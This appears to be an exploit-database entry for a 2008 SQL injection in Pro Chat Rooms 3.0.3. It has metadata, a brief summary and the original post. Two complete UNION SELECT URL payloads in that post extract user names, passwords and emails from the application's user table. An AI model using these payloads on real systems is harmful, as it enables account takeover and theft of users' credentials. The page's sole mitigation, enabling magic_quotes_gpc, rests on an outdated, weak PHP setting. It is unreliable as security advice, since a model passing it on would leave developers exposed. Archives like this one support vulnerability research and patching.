header-logo
Suggest Exploit
vendor:
Pro Chat Rooms
by:
~!Dok_tOR!~
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pro Chat Rooms
Affected Version From: 3.0.3
Affected Version To: 3.0.3
Patch Exists: NO
Related CWE: N/A
CPE: a:prochatrooms:pro_chat_rooms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SQL Injection in Pro Chat Rooms

Two exploits were found in Pro Chat Rooms version 3.0.3. The first exploit is a SQL injection vulnerability in the index.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable application. The second exploit is a SQL injection vulnerability in the admin.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Ensure that the 'magic_quotes_gpc' setting is enabled in the php.ini configuration file.
Source

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 28.09.08
Product: Pro Chat Rooms
Version: 3.0.3
Price: $55
URL: www.prochatrooms.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit 1:

http://localhost/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*

Exploit 2:

http://localhost/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*

# milw0rm.com [2008-09-28]